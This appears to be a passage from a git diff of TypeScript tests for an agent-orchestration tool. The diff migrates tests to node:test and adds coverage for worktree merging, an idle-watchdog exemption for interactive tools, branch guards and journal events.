+import { getSliceBranchName } from "../../worktree.ts";
+import { abortAndReset } from "../../git-self-heal.ts";
+import { runGSDDoctor } from "../../doctor.ts";
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
 
 // ---- Helpers ----
 
@@ -80,7 +80,7 @@ function addSliceToMilestone(
   run(`git merge --no-ff ${sliceBranch} -m "merge ${sliceId}"`, wtPath);
 }
 
-async function main(): Promise<void> {
+describe('worktree-e2e', async () => {
   const savedCwd = process.cwd();
   const tempDirs: string[] = [];
 
@@ -100,7 +100,7 @@ async function main(): Promise<void> {
       // Create worktree for M001
       const wtPath = createAutoWorktree(repo, "M001");
       tempDirs.push(wtPath);
-      assertTrue(existsSync(wtPath), "worktree directory created");
+      assert.ok(existsSync(wtPath), "worktree directory created");
 
       // Add two slices with commits
       addSliceToMilestone(repo, wtPath, "M001", "S01", "Add auth", [
@@ -124,19 +124,19 @@ async function main(): Promise<void> {
       // Assert exactly one new commit on main
       const mainLogAfter = run("git log --oneline main", repo);
       const commitCountAfter = mainLogAfter.split("\n").length;
-      assertEq(commitCountAfter, commitCountBefore + 1, "exactly one new commit on main");
+      assert.deepStrictEqual(commitCountAfter, commitCountBefore + 1, "exactly one new commit on main");
 
       // Commit message contains both slice titles
       const lastCommitMsg = run("git log -1 --format=%B main", repo);
-      assertMatch(lastCommitMsg, /Add auth/, "commit message contains S01 title");
-      assertMatch(lastCommitMsg, /Add dashboard/, "commit message contains S02 title");
+      assert.match(lastCommitMsg, /Add auth/, "commit message contains S01 title");
+      assert.match(lastCommitMsg, /Add dashboard/, "commit message contains S02 title");
 
       // Worktree directory removed
-      assertTrue(!existsSync(wtPath), "worktree directory removed after merge");
+      assert.ok(!existsSync(wtPath), "worktree directory removed after merge");
 
       // Milestone branch deleted
       const branches = run("git branch", repo);
-      assertTrue(!branches.includes("milestone/M001"), "milestone branch deleted");
+      assert.ok(!branches.includes("milestone/M001"), "milestone branch deleted");
     }
 
     // ================================================================
@@ -159,11 +159,11 @@ async function main(): Promise<void> {
 
       // Trigger merge conflict
       try { run("git merge feature", repo); } catch { /* expected */ }
-      assertTrue(existsSync(join(repo, ".git", "MERGE_HEAD")), "MERGE_HEAD exists before abort");
+      assert.ok(existsSync(join(repo, ".git", "MERGE_HEAD")), "MERGE_HEAD exists before abort");
 
       const abortResult = abortAndReset(repo);
-      assertTrue(!existsSync(join(repo, ".git", "MERGE_HEAD")), "MERGE_HEAD removed after abort");
-      assertTrue(abortResult.cleaned.length > 0, "abortAndReset reports cleaned items");
+      assert.ok(!existsSync(join(repo, ".git", "MERGE_HEAD")), "MERGE_HEAD removed after abort");
+      assert.ok(abortResult.cleaned.length > 0, "abortAndReset reports cleaned items");
     }
 
     // ================================================================
@@ -211,19 +211,19 @@ _None_
       // Detect
       const detect = await runGSDDoctor(repo, { isolationMode: "worktree" });
       const orphanIssues = detect.issues.filter(i => i.code === "orphaned_auto_worktree");
-      assertTrue(orphanIssues.length > 0, "doctor detects orphaned worktree");
-      assertEq(orphanIssues[0]?.unitId, "M001", "orphaned worktree unitId is M001");
+      assert.ok(orphanIssues.length > 0, "doctor detects orphaned worktree");
+      assert.deepStrictEqual(orphanIssues[0]?.unitId, "M001", "orphaned worktree unitId is M001");
 
       // Fix
       const fixed = await runGSDDoctor(repo, { fix: true, isolationMode: "worktree" });
-      assertTrue(
+      assert.ok(
         fixed.fixesApplied.some(f => f.includes("removed orphaned worktree")),
         "doctor fix removes orphaned worktree",
       );
 
       // Verify gone
       const wtList = run("git worktree list", repo);
-      assertTrue(!wtList.includes("milestone/M001"), "worktree gone after doctor fix");
+      assert.ok(!wtList.includes("milestone/M001"), "worktree gone after doctor fix");
     }
     } else {
       console.log("\n=== Doctor: orphaned worktree detection (skipped on Windows) ===");
@@ -234,8 +234,4 @@ _None_
       try { rmSync(d, { recursive: true, force: true }); } catch { /* ignore */ }
     }
   }
-
-  report();
-}
-
-main();
+});
diff --git a/src/resources/extensions/gsd/tests/interactive-tool-idle-exemption.test.ts b/src/resources/extensions/gsd/tests/interactive-tool-idle-exemption.test.ts
new file mode 100644
index 000000000..6f3da71dd
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/interactive-tool-idle-exemption.test.ts
@@ -0,0 +1,119 @@
+/**
+ * Tests for #2676: idle watchdog must exempt user-interactive tools
+ * (ask_user_questions, secure_env_collect) from stall detection.
+ */
+import { describe, test, beforeEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  markToolStart,
+  markToolEnd,
+  hasInteractiveToolInFlight,
+  getInFlightToolCount,
+  getOldestInFlightToolStart,
+  getOldestInFlightToolAgeMs,
+  clearInFlightTools,
+} from "../auto-tool-tracking.ts";
+
+// These tests call the tracking module directly (bypassing the auto.ts
+// wrapper which guards on s.active) so we always pass isActive=true.
+
+beforeEach(() => {
+  clearInFlightTools();
+});
+
+describe("hasInteractiveToolInFlight", () => {
+  test("returns false when no tools are in-flight", () => {
+    assert.equal(hasInteractiveToolInFlight(), false);
+  });
+
+  test("returns false when only non-interactive tools are in-flight", () => {
+    markToolStart("call-1", true, "bash");
+    markToolStart("call-2", true, "read");
+    assert.equal(hasInteractiveToolInFlight(), false);
+  });
+
+  test("returns true when ask_user_questions is in-flight", () => {
+    markToolStart("call-1", true, "bash");
+    markToolStart("call-2", true, "ask_user_questions");
+    assert.equal(hasInteractiveToolInFlight(), true);
+  });
+
+  test("returns true when secure_env_collect is in-flight", () => {
+    markToolStart("call-1", true, "secure_env_collect");
+    assert.equal(hasInteractiveToolInFlight(), true);
+  });
+
+  test("returns false after interactive tool completes", () => {
+    markToolStart("call-1", true, "ask_user_questions");
+    assert.equal(hasInteractiveToolInFlight(), true);
+    markToolEnd("call-1");
+    assert.equal(hasInteractiveToolInFlight(), false);
+  });
+
+  test("returns true if one of multiple tools is interactive", () => {
+    markToolStart("call-1", true, "bash");
+    markToolStart("call-2", true, "edit");
+    markToolStart("call-3", true, "ask_user_questions");
+    markToolStart("call-4", true, "write");
+    assert.equal(hasInteractiveToolInFlight(), true);
+  });
+});
+
+describe("toolName tracking in markToolStart", () => {
+  test("defaults toolName to 'unknown' when not provided", () => {
+    markToolStart("call-1", true);
+    // unknown tool should not be treated as interactive
+    assert.equal(hasInteractiveToolInFlight(), false);
+    assert.equal(getInFlightToolCount(), 1);
+  });
+
+  test("no-ops when isActive is false", () => {
+    markToolStart("call-1", false, "ask_user_questions");
+    assert.equal(getInFlightToolCount(), 0);
+    assert.equal(hasInteractiveToolInFlight(), false);
+  });
+});
+
+describe("existing tracking behavior preserved with toolName", () => {
+  test("getInFlightToolCount tracks correctly", () => {
+    assert.equal(getInFlightToolCount(), 0);
+    markToolStart("call-1", true, "bash");
+    assert.equal(getInFlightToolCount(), 1);
+    markToolStart("call-2", true, "ask_user_questions");
+    assert.equal(getInFlightToolCount(), 2);
+    markToolEnd("call-1");
+    assert.equal(getInFlightToolCount(), 1);
+    markToolEnd("call-2");
+    assert.equal(getInFlightToolCount(), 0);
+  });
+
+  test("getOldestInFlightToolStart returns correct timestamp", () => {
+    assert.equal(getOldestInFlightToolStart(), undefined);
+    const before = Date.now();
+    markToolStart("call-1", true, "bash");
+    const after = Date.now();
+    const oldest = getOldestInFlightToolStart();
+    assert.ok(oldest !== undefined);
+    assert.ok(oldest! >= before && oldest! <= after);
+  });
+
+  test("getOldestInFlightToolAgeMs returns 0 with no tools", () => {
+    assert.equal(getOldestInFlightToolAgeMs(), 0);
+  });
+
+  test("getOldestInFlightToolAgeMs returns positive value with tools", () => {
+    markToolStart("call-1", true, "read");
+    const age = getOldestInFlightToolAgeMs();
+    assert.ok(age >= 0, `age should be non-negative, got ${age}`);
+  });
+
+  test("clearInFlightTools resets all state", () => {
+    markToolStart("call-1", true, "ask_user_questions");
+    markToolStart("call-2", true, "bash");
+    assert.equal(getInFlightToolCount(), 2);
+    assert.equal(hasInteractiveToolInFlight(), true);
+    clearInFlightTools();
+    assert.equal(getInFlightToolCount(), 0);
+    assert.equal(hasInteractiveToolInFlight(), false);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/interrupted-session-auto.test.ts b/src/resources/extensions/gsd/tests/interrupted-session-auto.test.ts
index fefa690a5..38f6a4c81 100644
--- a/src/resources/extensions/gsd/tests/interrupted-session-auto.test.ts
+++ b/src/resources/extensions/gsd/tests/interrupted-session-auto.test.ts
@@ -57,7 +57,7 @@ function writeCompleteArtifacts(base: string): void {
   writeFileSync(join(milestoneDir, "M001-SUMMARY.md"), "# Milestone Summary\nDone.\n", "utf-8");
 }
 
-function writeLock(base: string, unitType: string, unitId: string, completedUnits = 1): void {
+function writeLock(base: string, unitType: string, unitId: string): void {
   writeFileSync(
     join(base, ".gsd", "auto.lock"),
     JSON.stringify({
@@ -66,7 +66,6 @@ function writeLock(base: string, unitType: string, unitId: string, completedUnit
       unitType,
       unitId,
       unitStartedAt: new Date().toISOString(),
-      completedUnits,
     }, null, 2),
     "utf-8",
   );
@@ -87,7 +86,7 @@ test("direct /gsd auto stale complete repo yields stale classification with no r
   try {
     writeRoadmap(base, true);
     writeCompleteArtifacts(base);
-    writeLock(base, "execute-task", "M001/S01/T01", 1);
+    writeLock(base, "execute-task", "M001/S01/T01");
 
     const assessment = await assessInterruptedSession(base);
     assert.equal(assessment.classification, "stale");
@@ -103,7 +102,7 @@ test("direct /gsd auto paused-session metadata remains recoverable when work is
   try {
     writeRoadmap(base, false);
     writePausedSession(base, "M001", false);
-    writeLock(base, "execute-task", "M001/S01/T01", 1);
+    writeLock(base, "execute-task", "M001/S01/T01");
 
     const assessment = await assessInterruptedSession(base);
     assert.equal(assessment.classification, "recoverable");
diff --git a/src/resources/extensions/gsd/tests/interrupted-session-ui.test.ts b/src/resources/extensions/gsd/tests/interrupted-session-ui.test.ts
index a97f54e06..21a6ca2ce 100644
--- a/src/resources/extensions/gsd/tests/interrupted-session-ui.test.ts
+++ b/src/resources/extensions/gsd/tests/interrupted-session-ui.test.ts
@@ -67,7 +67,7 @@ function writePausedSession(base: string, milestoneId = "M001", stepMode = false
   );
 }
 
-function writeLock(base: string, unitType: string, unitId: string, completedUnits = 1): void {
+function writeLock(base: string, unitType: string, unitId: string): void {
   writeFileSync(
     join(base, ".gsd", "auto.lock"),
     JSON.stringify({
@@ -76,7 +76,6 @@ function writeLock(base: string, unitType: string, unitId: string, completedUnit
       unitType,
       unitId,
       unitStartedAt: new Date().toISOString(),
-      completedUnits,
     }, null, 2),
     "utf-8",
   );
@@ -87,7 +86,7 @@ test("guided-flow stale complete scenario classifies as stale so the resume prom
   try {
     writeRoadmap(base, true);
     writeCompleteArtifacts(base);
-    writeLock(base, "execute-task", "M001/S01/T01", 1);
+    writeLock(base, "execute-task", "M001/S01/T01");
 
     const assessment = await assessInterruptedSession(base);
     assert.equal(assessment.classification, "stale");
@@ -102,7 +101,7 @@ test("guided-flow paused-session scenario classifies as recoverable so resume re
   try {
     writeRoadmap(base, false);
     writePausedSession(base);
-    writeLock(base, "execute-task", "M001/S01/T01", 1);
+    writeLock(base, "execute-task", "M001/S01/T01");
 
     const assessment = await assessInterruptedSession(base);
     assert.equal(assessment.classification, "recoverable");
@@ -133,6 +132,5 @@ test("guided-flow source uses step-aware resume and clears stale paused metadata
   assert.ok(source.includes('resumeLabel = interrupted.pausedSession?.stepMode'));
   assert.ok(source.includes('step: interrupted.pausedSession?.stepMode ?? false'));
   assert.ok(source.includes('unlinkSync(join(gsdRoot(basePath), "runtime", "paused-session.json"))'));
-  assert.ok(source.includes('pendingAutoStart = { ctx, pi, basePath, milestoneId: mid, step: false };'));
-  assert.ok(source.includes('pendingAutoStart = { ctx, pi, basePath, milestoneId: nextId, step: false };'));
+  assert.ok(source.includes('pendingAutoStartMap.set(basePath,'));
 });
diff --git a/src/resources/extensions/gsd/tests/isolation-none-branch-guard.test.ts b/src/resources/extensions/gsd/tests/isolation-none-branch-guard.test.ts
new file mode 100644
index 000000000..5acf71583
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/isolation-none-branch-guard.test.ts
@@ -0,0 +1,62 @@
+/**
+ * Regression test for #3675 — isolation:none stale branch guard
+ *
+ * When switching from isolation:branch/worktree to isolation:none, HEAD
+ * could remain on a milestone/<MID> branch. The fix in auto-start.ts
+ * detects this and auto-checks out to the integration branch.
+ *
+ * This structural test verifies the milestone/ branch check exists
+ * in auto-start.ts.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(join(__dirname, '..', 'auto-start.ts'), 'utf-8');
+
+describe('isolation:none stale branch guard (#3675)', () => {
+  test('checks for milestone/ branch prefix', () => {
+    assert.match(source, /startsWith\(["']milestone\//,
+      'auto-start should check for milestone/ branch prefix');
+  });
+
+  test('imports nativeGetCurrentBranch', () => {
+    assert.match(source, /nativeGetCurrentBranch/,
+      'auto-start should import nativeGetCurrentBranch');
+  });
+
+  test('imports nativeDetectMainBranch', () => {
+    assert.match(source, /nativeDetectMainBranch/,
+      'auto-start should import nativeDetectMainBranch');
+  });
+
+  test('imports nativeCheckoutBranch', () => {
+    assert.match(source, /nativeCheckoutBranch/,
+      'auto-start should import nativeCheckoutBranch');
+  });
+
+  test('guard is conditional on isolation mode "none"', () => {
+    assert.match(source, /getIsolationMode\(\)\s*===\s*["']none["']/,
+      'guard should only activate when isolation mode is "none"');
+  });
+
+  test('calls nativeCheckoutBranch to return to integration branch', () => {
+    assert.match(source, /nativeCheckoutBranch\(base,\s*integrationBranch\)/,
+      'should checkout to the integration branch');
+  });
+
+  test('guard is wrapped in try-catch (non-fatal)', () => {
+    // Find the milestone/ check and verify it is inside a try block
+    const milestoneIdx = source.indexOf('startsWith("milestone/")');
+    assert.ok(milestoneIdx > 0, 'milestone/ check should exist');
+    const before = source.slice(Math.max(0, milestoneIdx - 500), milestoneIdx);
+    assert.match(before, /try\s*\{/,
+      'milestone branch guard should be inside a try block');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/journal-integration.test.ts b/src/resources/extensions/gsd/tests/journal-integration.test.ts
index 24de635db..c05c6b3fc 100644
--- a/src/resources/extensions/gsd/tests/journal-integration.test.ts
+++ b/src/resources/extensions/gsd/tests/journal-integration.test.ts
@@ -72,7 +72,7 @@ function makeMockDeps(
     getCurrentBranch: () => "main",
     autoWorktreeBranch: () => "auto/M001",
     resolveMilestoneFile: () => null,
-    reconcileMergeState: () => false,
+    reconcileMergeState: () => "clean",
     getLedger: () => ({ units: [] }),
     getProjectTotals: () => ({ cost: 0 }),
     formatCost: (c: number) => `$${c.toFixed(2)}`,
@@ -91,18 +91,13 @@ function makeMockDeps(
     runPreDispatchHooks: () => ({ firedHooks: [], action: "proceed" }),
     getPriorSliceCompletionBlocker: () => null,
     getMainBranch: () => "main",
-    collectObservabilityWarnings: async () => [],
-    buildObservabilityRepairBlock: () => null,
     closeoutUnit: async () => {},
-    verifyExpectedArtifact: () => true,
-    clearUnitRuntimeRecord: () => {},
-    writeUnitRuntimeRecord: () => {},
     recordOutcome: () => {},
     writeLock: () => {},
     captureAvailableSkills: () => {},
     ensurePreconditions: () => {},
     updateSliceProgressCache: () => {},
-    selectAndApplyModel: async () => ({ routing: null }),
+    selectAndApplyModel: async () => ({ routing: null, appliedModel: null }),
     startUnitSupervision: () => {},
     getDeepDiagnostic: () => null,
     isDbAvailable: () => false,
@@ -221,7 +216,7 @@ test("runDispatch emits dispatch-match with correct rule and flowId", async () =
     mid: "M001",
     midTitle: "Test Milestone",
   };
-  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0 };
+  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0, consecutiveFinalizeTimeouts: 0 };
 
   const result = await runDispatch(ic, preData, loopState);
 
@@ -253,7 +248,7 @@ test("runDispatch emits dispatch-stop when dispatch returns stop action", async
     mid: "M001",
     midTitle: "Test",
   };
-  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0 };
+  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0, consecutiveFinalizeTimeouts: 0 };
 
   const result = await runDispatch(ic, preData, loopState);
   assert.equal(result.action, "break");
@@ -265,6 +260,62 @@ test("runDispatch emits dispatch-stop when dispatch returns stop action", async
   assert.equal(stopEvents[0].flowId, ic.flowId);
 });
 
+test("runDispatch checks prior-slice completion against the project root in worktree mode", async () => {
+  const capture = createEventCapture();
+  const guardCalls: Array<{ fn: string; args: unknown[] }> = [];
+  const deps = makeMockDeps(capture, {
+    getMainBranch: (basePath: string) => {
+      guardCalls.push({ fn: "getMainBranch", args: [basePath] });
+      return "main";
+    },
+    getPriorSliceCompletionBlocker: (
+      basePath: string,
+      mainBranch: string,
+      unitType: string,
+      unitId: string,
+    ) => {
+      guardCalls.push({
+        fn: "getPriorSliceCompletionBlocker",
+        args: [basePath, mainBranch, unitType, unitId],
+      });
+      return null;
+    },
+  });
+  const ic = makeIC(deps, {
+    s: {
+      ...makeSession(),
+      basePath: "/tmp/project/.gsd/worktrees/M029-xoklo9",
+      originalBasePath: "/tmp/project",
+    } as any,
+  });
+  const preData: PreDispatchData = {
+    state: {
+      phase: "executing",
+      activeMilestone: { id: "M029-xoklo9", title: "Test", status: "active" },
+      activeSlice: { id: "S01", title: "Slice 1" },
+      registry: [{ id: "M029-xoklo9", status: "active" }],
+      blockers: [],
+    } as any,
+    mid: "M029-xoklo9",
+    midTitle: "Test Milestone",
+  };
+
+  const result = await runDispatch(ic, preData, {
+    recentUnits: [],
+    stuckRecoveryAttempts: 0,
+    consecutiveFinalizeTimeouts: 0,
+  });
+
+  assert.equal(result.action, "next");
+  assert.deepEqual(guardCalls, [
+    { fn: "getMainBranch", args: ["/tmp/project"] },
+    {
+      fn: "getPriorSliceCompletionBlocker",
+      args: ["/tmp/project", "main", "execute-task", "M001/S01/T01"],
+    },
+  ]);
+});
+
 test("runUnitPhase emits unit-start and unit-end with causedBy reference", async () => {
   const capture = createEventCapture();
 
@@ -287,14 +338,13 @@ test("runUnitPhase emits unit-start and unit-end with causedBy reference", async
     prompt: "do stuff",
     finalPrompt: "do stuff",
     pauseAfterUatDispatch: false,
-    observabilityIssues: [],
     state: { phase: "executing", activeMilestone: { id: "M001" }, activeSlice: { id: "S01" }, registry: [], blockers: [] } as any,
     mid: "M001",
     midTitle: "Test",
     isRetry: false,
     previousTier: undefined,
   };
-  const loopState: LoopState = { recentUnits: [{ key: "execute-task/M001/S01/T01" }], stuckRecoveryAttempts: 0 };
+  const loopState: LoopState = { recentUnits: [{ key: "execute-task/M001/S01/T01" }], stuckRecoveryAttempts: 0, consecutiveFinalizeTimeouts: 0 };
 
   // Start runUnitPhase (it will block on runUnit internally)
   const unitPromise = runUnitPhase(ic, iterData, loopState);
@@ -351,7 +401,7 @@ test("all events from a mock iteration have monotonically increasing seq and sam
     mid: "M001",
     midTitle: "Test",
   };
-  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0 };
+  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0, consecutiveFinalizeTimeouts: 0 };
   const dispatchResult = await runDispatch(ic, preData, loopState);
   assert.equal(dispatchResult.action, "next");
 
@@ -397,7 +447,7 @@ test("dispatch-match events include matchedRule field matching the rule name", a
     midTitle: "Test",
   };
 
-  await runDispatch(ic, preData, { recentUnits: [], stuckRecoveryAttempts: 0 });
+  await runDispatch(ic, preData, { recentUnits: [], stuckRecoveryAttempts: 0, consecutiveFinalizeTimeouts: 0 });
 
   const matchEvents = capture.events.filter(e => e.eventType === "dispatch-match");
   assert.equal(matchEvents.length, 1);
@@ -426,7 +476,7 @@ test("pre-dispatch-hook event is emitted when hooks fire", async () => {
     midTitle: "Test",
   };
 
-  await runDispatch(ic, preData, { recentUnits: [], stuckRecoveryAttempts: 0 });
+  await runDispatch(ic, preData, { recentUnits: [], stuckRecoveryAttempts: 0, consecutiveFinalizeTimeouts: 0 });
 
   const hookEvents = capture.events.filter(e => e.eventType === "pre-dispatch-hook");
   assert.equal(hookEvents.length, 1, "should emit one pre-dispatch-hook event");
@@ -448,7 +498,7 @@ test("terminal event is emitted on milestone-complete", async () => {
     }) as any,
   });
   const ic = makeIC(deps);
-  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0 };
+  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0, consecutiveFinalizeTimeouts: 0 };
 
   const result = await runPreDispatch(ic, loopState);
   assert.equal(result.action, "break");
@@ -472,7 +522,7 @@ test("terminal event is emitted on blocked state", async () => {
     }) as any,
   });
   const ic = makeIC(deps);
-  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0 };
+  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0, consecutiveFinalizeTimeouts: 0 };
 
   const result = await runPreDispatch(ic, loopState);
   assert.equal(result.action, "break");
@@ -501,7 +551,7 @@ test("milestone-transition event is emitted when milestone changes", async () =>
   const ic = makeIC(deps);
   // Session says current milestone is M001, but state will return M002
   ic.s.currentMilestoneId = "M001";
-  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0 };
+  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0, consecutiveFinalizeTimeouts: 0 };
 
   await runPreDispatch(ic, loopState);
 
@@ -511,3 +561,42 @@ test("milestone-transition event is emitted when milestone changes", async () =>
   assert.equal((transitionEvents[0].data as any).to, "M002");
   assert.equal(transitionEvents[0].flowId, ic.flowId);
 });
+
+test("unit-end event contains errorContext when unit is cancelled with structured error", async () => {
+  const capture = createEventCapture();
+  const { resolveAgentEndCancelled, _resetPendingResolve } = await import("../auto-loop.js");
+  _resetPendingResolve();
+
+  const deps = makeMockDeps(capture);
+  const ic = makeIC(deps);
+  const iterData: IterationData = {
+    unitType: "execute-task",
+    unitId: "M001/S01/T01",
+    prompt: "do stuff",
+    finalPrompt: "do stuff",
+    pauseAfterUatDispatch: false,
+    state: { phase: "executing", activeMilestone: { id: "M001" }, activeSlice: { id: "S01" }, registry: [], blockers: [] } as any,
+    mid: "M001",
+    midTitle: "Test",
+    isRetry: false,
+    previousTier: undefined,
+  };
+  const loopState: LoopState = { recentUnits: [{ key: "execute-task/M001/S01/T01" }], stuckRecoveryAttempts: 0, consecutiveFinalizeTimeouts: 0 };
+
+  const unitPromise = runUnitPhase(ic, iterData, loopState);
+  await new Promise(r => setTimeout(r, 50));
+
+  // Resolve with errorContext (simulates a timeout cancel)
+  resolveAgentEndCancelled({ message: "Hard timeout error: exceeded limit", category: "timeout", isTransient: true });
+
+  const result = await unitPromise;
+  // Transient timeout cancellations pause (recoverable) instead of hard-stopping
+  assert.equal(result.action, "break");
+  assert.equal((result as any).reason, "session-timeout");
+
+  // Verify error classification used structured errorContext on the window entry
+  const entry = loopState.recentUnits[loopState.recentUnits.length - 1];
+  assert.ok(entry.error, "window entry must have error set");
+  assert.ok(entry.error!.startsWith("timeout:"), "error must start with category from errorContext");
+  assert.ok(entry.error!.includes("Hard timeout error"), "error must include the errorContext message");
+});
diff --git a/src/resources/extensions/gsd/tests/journal.test.ts b/src/resources/extensions/gsd/tests/journal.test.ts
index 5808b67bb..96a39e064 100644
--- a/src/resources/extensions/gsd/tests/journal.test.ts
+++ b/src/resources/extensions/gsd/tests/journal.test.ts
@@ -1,4 +1,4 @@
-import test from "node:test";
+import { describe, test, beforeEach, afterEach } from "node:test";
 import assert from "node:assert/strict";
 import {
   mkdirSync,
@@ -46,9 +46,12 @@ function makeEntry(overrides: Partial<JournalEntry> = {}): JournalEntry {
 
 // ─── emitJournalEvent ─────────────────────────────────────────────────────────
 
-test("emitJournalEvent creates journal directory and JSONL file", () => {
-  const base = makeTmpBase();
-  try {
+describe("emitJournalEvent", () => {
+  let base: string;
+  beforeEach(() => { base = makeTmpBase(); });
+  afterEach(() => { cleanup(base); });
+
+  test("creates journal directory and JSONL file", () => {
     const entry = makeEntry();
     emitJournalEvent(base, entry);
 
@@ -61,14 +64,9 @@ test("emitJournalEvent creates journal directory and JSONL file", () => {
     assert.equal(parsed.flowId, entry.flowId);
     assert.equal(parsed.seq, entry.seq);
     assert.equal(parsed.eventType, entry.eventType);
-  } finally {
-    cleanup(base);
-  }
-});
+  });
 
-test("emitJournalEvent appends multiple lines to the same file", () => {
-  const base = makeTmpBase();
-  try {
+  test("appends multiple lines to the same file", () => {
     emitJournalEvent(base, makeEntry({ seq: 0 }));
     emitJournalEvent(base, makeEntry({ seq: 1, eventType: "dispatch-match" }));
     emitJournalEvent(base, makeEntry({ seq: 2, eventType: "unit-start" }));
@@ -82,26 +80,9 @@ test("emitJournalEvent appends multiple lines to the same file", () => {
     assert.equal(parsed[1].seq, 1);
     assert.equal(parsed[2].seq, 2);
     assert.equal(parsed[1].eventType, "dispatch-match");
-  } finally {
-    cleanup(base);
-  }
-});
+  });
 
-test("emitJournalEvent auto-creates nonexistent parent directory", () => {
-  const base = join(tmpdir(), `gsd-journal-test-${randomUUID()}`);
-  // Don't create .gsd/ — emitJournalEvent should handle it via mkdirSync recursive
-  try {
-    emitJournalEvent(base, makeEntry());
-    const filePath = join(base, ".gsd", "journal", "2025-03-21.jsonl");
-    assert.ok(existsSync(filePath), "File should exist even when parent dirs did not");
-  } finally {
-    cleanup(base);
-  }
-});
-
-test("emitJournalEvent preserves optional fields (rule, causedBy, data)", () => {
-  const base = makeTmpBase();
-  try {
+  test("preserves optional fields (rule, causedBy, data)", () => {
     const entry = makeEntry({
       rule: "my-dispatch-rule",
       causedBy: { flowId: "flow-prior", seq: 3 },
@@ -115,9 +96,42 @@ test("emitJournalEvent preserves optional fields (rule, causedBy, data)", () =>
     assert.deepEqual(parsed.causedBy, { flowId: "flow-prior", seq: 3 });
     assert.equal(parsed.data.unitId, "M001/S01/T01");
     assert.equal(parsed.data.status, "ok");
-  } finally {
-    cleanup(base);
-  }
+  });
+
+  test("silently catches read-only directory errors", () => {
+    const journalDir = join(base, ".gsd", "journal");
+    mkdirSync(journalDir, { recursive: true });
+
+    // Make the journal directory read-only
+    chmodSync(journalDir, 0o444);
+
+    // Should not throw
+    assert.doesNotThrow(() => {
+      emitJournalEvent(base, makeEntry());
+    });
+
+    // Restore permissions for cleanup
+    try {
+      chmodSync(journalDir, 0o755);
+    } catch {
+      /* */
+    }
+  });
+});
+
+describe("emitJournalEvent — auto-creates parent directory", () => {
+  let base: string;
+  beforeEach(() => {
+    base = join(tmpdir(), `gsd-journal-test-${randomUUID()}`);
+    // Don't create .gsd/ — emitJournalEvent should handle it via mkdirSync recursive
+  });
+  afterEach(() => { cleanup(base); });
+
+  test("auto-creates nonexistent parent directory", () => {
+    emitJournalEvent(base, makeEntry());
+    const filePath = join(base, ".gsd", "journal", "2025-03-21.jsonl");
+    assert.ok(existsSync(filePath), "File should exist even when parent dirs did not");
+  });
 });
 
 test("emitJournalEvent silently catches write errors (no throw)", () => {
@@ -127,35 +141,14 @@ test("emitJournalEvent silently catches write errors (no throw)", () => {
   });
 });
 
-test("emitJournalEvent silently catches read-only directory errors", () => {
-  const base = makeTmpBase();
-  const journalDir = join(base, ".gsd", "journal");
-  mkdirSync(journalDir, { recursive: true });
-
-  try {
-    // Make the journal directory read-only
-    chmodSync(journalDir, 0o444);
-
-    // Should not throw
-    assert.doesNotThrow(() => {
-      emitJournalEvent(base, makeEntry());
-    });
-  } finally {
-    // Restore permissions for cleanup
-    try {
-      chmodSync(journalDir, 0o755);
-    } catch {
-      /* */
-    }
-    cleanup(base);
-  }
-});
-
 // ─── Daily Rotation ───────────────────────────────────────────────────────────
 
-test("daily rotation: events with different dates go to different files", () => {
-  const base = makeTmpBase();
-  try {
+describe("daily rotation", () => {
+  let base: string;
+  beforeEach(() => { base = makeTmpBase(); });
+  afterEach(() => { cleanup(base); });
+
+  test("events with different dates go to different files", () => {
     emitJournalEvent(base, makeEntry({ ts: "2025-03-20T23:59:59.000Z" }));
     emitJournalEvent(base, makeEntry({ ts: "2025-03-21T00:00:01.000Z" }));
     emitJournalEvent(base, makeEntry({ ts: "2025-03-22T12:00:00.000Z" }));
@@ -172,16 +165,17 @@ test("daily rotation: events with different dates go to different files", () =>
         .split("\n");
       assert.equal(lines.length, 1, `${date}.jsonl should have 1 line`);
     }
-  } finally {
-    cleanup(base);
-  }
+  });
 });
 
 // ─── queryJournal ─────────────────────────────────────────────────────────────
 
-test("queryJournal returns all entries when no filters provided", () => {
-  const base = makeTmpBase();
-  try {
+describe("queryJournal", () => {
+  let base: string;
+  beforeEach(() => { base = makeTmpBase(); });
+  afterEach(() => { cleanup(base); });
+
+  test("returns all entries when no filters provided", () => {
     emitJournalEvent(base, makeEntry({ seq: 0 }));
     emitJournalEvent(base, makeEntry({ seq: 1, eventType: "dispatch-match" }));
 
@@ -189,14 +183,9 @@ test("queryJournal returns all entries when no filters provided", () => {
     assert.equal(results.length, 2);
     assert.equal(results[0].seq, 0);
     assert.equal(results[1].seq, 1);
-  } finally {
-    cleanup(base);
-  }
-});
+  });
 
-test("queryJournal filters by flowId", () => {
-  const base = makeTmpBase();
-  try {
+  test("filters by flowId", () => {
     emitJournalEvent(base, makeEntry({ flowId: "flow-aaa", seq: 0 }));
     emitJournalEvent(base, makeEntry({ flowId: "flow-bbb", seq: 1 }));
     emitJournalEvent(base, makeEntry({ flowId: "flow-aaa", seq: 2 }));
@@ -204,14 +193,9 @@ test("queryJournal filters by flowId", () => {
     const results = queryJournal(base, { flowId: "flow-aaa" });
     assert.equal(results.length, 2);
     assert.ok(results.every(e => e.flowId === "flow-aaa"));
